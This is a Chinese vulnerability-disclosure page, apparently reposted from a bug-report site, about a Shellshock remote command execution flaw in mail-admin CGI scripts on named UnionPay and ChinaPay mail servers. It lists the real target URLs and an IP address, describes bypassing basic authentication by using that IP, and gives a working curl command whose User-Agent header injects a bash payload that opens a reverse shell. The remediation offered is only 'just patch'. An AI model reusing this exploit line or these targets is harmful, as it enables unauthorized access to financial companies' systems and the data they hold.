作品发布     邀请码    设为首页  收藏 

当前位置:文章漏洞 → 文章内容 >> 某金融系统3个邮件系统bash远程命令执行漏洞(绕过基础验证)


某金融系统3个邮件系统bash远程命令执行漏洞(绕过基础验证)

更新时间:2014-11-15 16:56:25   作者:佚名  来源:不详

银联商务:http://mail.chinaums.com/cgi-bin/madmin.cgi

https://gateway2.unionpay.com/cgi-bin/madmin.cgi

https://mail.unionpay.com/cgi-bin/madmin.cgi

银联在线:http://mail.chinapay.com/cgi-bin/madmin.cgi 银联在线这个存在基础认证 直接使用ip访问即可绕过(ip:218.80.244.37)



code 区域
curl  -A "() { :; }; /bin/bash -i > /dev/tcp/127.0.0.1/2345 0<&1 2>&1" http://218.80.244.37/cgi-bin/madmin.cgi -v



漏洞证明:

D7D657D6-F199-4E74-ABB0-7B9D0EFAF3F1.png



702BD97A-D37E-417F-87FA-AA7F287B22A2.png



D108F244-9803-410D-BCA1-A3E2B8C20C60.png

修复方案:

打补丁呗

责任编辑:华中帝国        



本文引用网址: 

某金融系统3个邮件系统bash远程命令执行漏洞(绕过基础验证)的相关文章
发表评论

用户名: 查看更多评论

分 值:100分 85分 70分 55分 40分 25分 10分 0分

内 容:

         (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码